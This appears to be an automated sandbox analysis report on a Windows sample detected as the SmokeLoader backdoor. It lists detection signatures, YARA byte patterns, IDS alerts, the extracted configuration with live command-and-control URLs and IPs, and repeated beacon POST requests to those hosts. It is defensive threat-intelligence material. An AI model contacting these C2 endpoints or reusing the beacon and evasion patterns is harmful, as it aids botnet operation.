Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532900
MD5:29eaf4b051758c9946539b6ba8aa475f
SHA1:7f2ce245c72d8689aaa7460cd6d12db57b9c36ba
SHA256:8001af6bbc3cc10b1382c5efc800e479804ad1e30f0d99a57add656a811afbcd
Tags:exeuser-Bitsight
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 29EAF4B051758C9946539B6BA8AA475F)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • fbtdajh (PID: 5492 cmdline: C:\Users\user\AppData\Roaming\fbtdajh MD5: 29EAF4B051758C9946539B6BA8AA475F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x3886:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 8 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\fbtdajh, CommandLine: C:\Users\user\AppData\Roaming\fbtdajh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\fbtdajh, NewProcessName: C:\Users\user\AppData\Roaming\fbtdajh, OriginalFileName: C:\Users\user\AppData\Roaming\fbtdajh, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\fbtdajh, ProcessId: 5492, ProcessName: fbtdajh
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-14T06:02:41.580888+020020391031A Network Trojan was detected192.168.2.649862125.7.253.1080TCP
      2024-10-14T06:02:43.242369+020020391031A Network Trojan was detected192.168.2.649873125.7.253.1080TCP
      2024-10-14T06:02:44.741563+020020391031A Network Trojan was detected192.168.2.649884125.7.253.1080TCP
      2024-10-14T06:02:46.242232+020020391031A Network Trojan was detected192.168.2.649895125.7.253.1080TCP
      2024-10-14T06:02:47.819583+020020391031A Network Trojan was detected192.168.2.649906125.7.253.1080TCP
      2024-10-14T06:02:49.336141+020020391031A Network Trojan was detected192.168.2.649917125.7.253.1080TCP
      2024-10-14T06:02:50.858357+020020391031A Network Trojan was detected192.168.2.649928125.7.253.1080TCP
      2024-10-14T06:02:52.382811+020020391031A Network Trojan was detected192.168.2.649939125.7.253.1080TCP
      2024-10-14T06:02:53.931040+020020391031A Network Trojan was detected192.168.2.649949125.7.253.1080TCP
      2024-10-14T06:02:55.571568+020020391031A Network Trojan was detected192.168.2.649960125.7.253.1080TCP
      2024-10-14T06:02:57.199668+020020391031A Network Trojan was detected192.168.2.649972125.7.253.1080TCP
      2024-10-14T06:02:58.792799+020020391031A Network Trojan was detected192.168.2.649983125.7.253.1080TCP
      2024-10-14T06:03:00.282605+020020391031A Network Trojan was detected192.168.2.649994125.7.253.1080TCP
      2024-10-14T06:03:02.013801+020020391031A Network Trojan was detected192.168.2.649996125.7.253.1080TCP
      2024-10-14T06:03:03.632852+020020391031A Network Trojan was detected192.168.2.649997125.7.253.1080TCP
      2024-10-14T06:03:05.160241+020020391031A Network Trojan was detected192.168.2.649999125.7.253.1080TCP
      2024-10-14T06:03:06.773833+020020391031A Network Trojan was detected192.168.2.650001125.7.253.1080TCP
      2024-10-14T06:03:08.494699+020020391031A Network Trojan was detected192.168.2.650002125.7.253.1080TCP
      2024-10-14T06:03:10.116735+020020391031A Network Trojan was detected192.168.2.650003125.7.253.1080TCP
      2024-10-14T06:03:11.620256+020020391031A Network Trojan was detected192.168.2.650004125.7.253.1080TCP
      2024-10-14T06:03:13.111163+020020391031A Network Trojan was detected192.168.2.650005125.7.253.1080TCP
      2024-10-14T06:03:14.871674+020020391031A Network Trojan was detected192.168.2.650006125.7.253.1080TCP
      2024-10-14T06:03:16.441473+020020391031A Network Trojan was detected192.168.2.650007125.7.253.1080TCP
      2024-10-14T06:03:18.047258+020020391031A Network Trojan was detected192.168.2.650008125.7.253.1080TCP
      2024-10-14T06:03:19.642690+020020391031A Network Trojan was detected192.168.2.650009125.7.253.1080TCP
      2024-10-14T06:03:21.149882+020020391031A Network Trojan was detected192.168.2.650010125.7.253.1080TCP
      2024-10-14T06:03:22.762582+020020391031A Network Trojan was detected192.168.2.650011125.7.253.1080TCP
      2024-10-14T06:03:24.252561+020020391031A Network Trojan was detected192.168.2.650012125.7.253.1080TCP
      2024-10-14T06:03:25.849542+020020391031A Network Trojan was detected192.168.2.650013125.7.253.1080TCP
      2024-10-14T06:03:27.421559+020020391031A Network Trojan was detected192.168.2.650014125.7.253.1080TCP
      2024-10-14T06:03:29.192946+020020391031A Network Trojan was detected192.168.2.650015125.7.253.1080TCP
      2024-10-14T06:03:30.817494+020020391031A Network Trojan was detected192.168.2.650016125.7.253.1080TCP
      2024-10-14T06:03:32.304663+020020391031A Network Trojan was detected192.168.2.650017125.7.253.1080TCP
      2024-10-14T06:03:34.246847+020020391031A Network Trojan was detected192.168.2.650018125.7.253.1080TCP
      2024-10-14T06:03:36.144916+020020391031A Network Trojan was detected192.168.2.650019125.7.253.1080TCP
      2024-10-14T06:04:45.418789+020020391031A Network Trojan was detected192.168.2.650023125.7.253.1080TCP
      2024-10-14T06:04:51.149380+020020391031A Network Trojan was detected192.168.2.650024125.7.253.1080TCP
      2024-10-14T06:04:58.244487+020020391031A Network Trojan was detected192.168.2.650025125.7.253.1080TCP
      2024-10-14T06:05:04.062889+020020391031A Network Trojan was detected192.168.2.650026125.7.253.1080TCP
      2024-10-14T06:05:10.088773+020020391031A Network Trojan was detected192.168.2.650027125.7.253.1080TCP
      2024-10-14T06:05:18.035144+020020391031A Network Trojan was detected192.168.2.650028211.171.233.12980TCP
      2024-10-14T06:05:24.004900+020020391031A Network Trojan was detected192.168.2.650030211.171.233.12980TCP
      2024-10-14T06:05:31.785512+020020391031A Network Trojan was detected192.168.2.650031211.171.233.12980TCP
      2024-10-14T06:05:37.620142+020020391031A Network Trojan was detected192.168.2.650032211.171.233.12980TCP
      2024-10-14T06:05:43.752844+020020391031A Network Trojan was detected192.168.2.650033211.171.233.12980TCP
      2024-10-14T06:05:49.451325+020020391031A Network Trojan was detected192.168.2.650034211.171.233.12980TCP
      2024-10-14T06:05:55.638546+020020391031A Network Trojan was detected192.168.2.650035211.171.233.12980TCP
      2024-10-14T06:06:00.592981+020020391031A Network Trojan was detected192.168.2.650036211.171.233.12980TCP
      2024-10-14T06:06:06.826789+020020391031A Network Trojan was detected192.168.2.650037211.171.233.12980TCP
      2024-10-14T06:06:13.270043+020020391031A Network Trojan was detected192.168.2.650038211.171.233.12980TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
      Source: C:\Users\user\AppData\Roaming\fbtdajhReversingLabs: Detection: 42%
      Source: file.exeReversingLabs: Detection: 42%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\fbtdajhJoe Sandbox ML: detected
      Source: file.exeJoe Sandbox ML: detected
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49917 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49873 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49862 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49960 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49997 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49939 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50002 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49996 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49999 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49983 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49884 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50011 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50009 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50006 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50019 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49895 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50016 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50001 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50013 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50008 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50023 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50033 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50005 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50012 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50032 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50004 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50014 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50010 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50024 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50007 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50026 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50030 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50003 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50015 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50034 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50031 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50017 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49906 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49949 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49994 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50036 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49928 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50025 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50028 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50027 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50018 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50035 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49972 -> 125.7.253.10:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50037 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50038 -> 211.171.233.129:80
      Source: C:\Windows\explorer.exeNetwork Connect: 125.7.253.10 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.129 80Jump to behavior
      Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
      Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 211.171.233.129 211.171.233.129
      Source: Joe Sandbox ViewIP Address: 125.7.253.10 125.7.253.10
      Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
      Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxrdkpxlrlca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxkflswhfdlbttc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tagqqmqbryxkm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plwcwjrcahoa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pucwrkwjfycmguw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tqcdafuvgwwyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dujexgghfqd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhntbwctbsxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://numxyybjlxnij.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxvvlpafyplsfmh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agcejdimcyykepgs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbsqbgjbfyr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqejwgffiikyio.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evinpfxalwnnmcek.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vsgvwtqctrqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aspcynlesjwhi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkejxmgpctomkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doyodlaoiwpyujb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foywayqrovd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eekncfsmpbrkmlo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://clxaxfnyuedfqps.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uimdgsgyvhhaem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eeyuetrukjpircst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydaciekeaeuaol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://voyqfwrggnp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blxnotvrjvnu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fplvqqohjqdma.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdjriakbylriblg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgyfmqyxpkmdbygm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eyrnjiqpamojnvp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rlfugmueckmpbf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
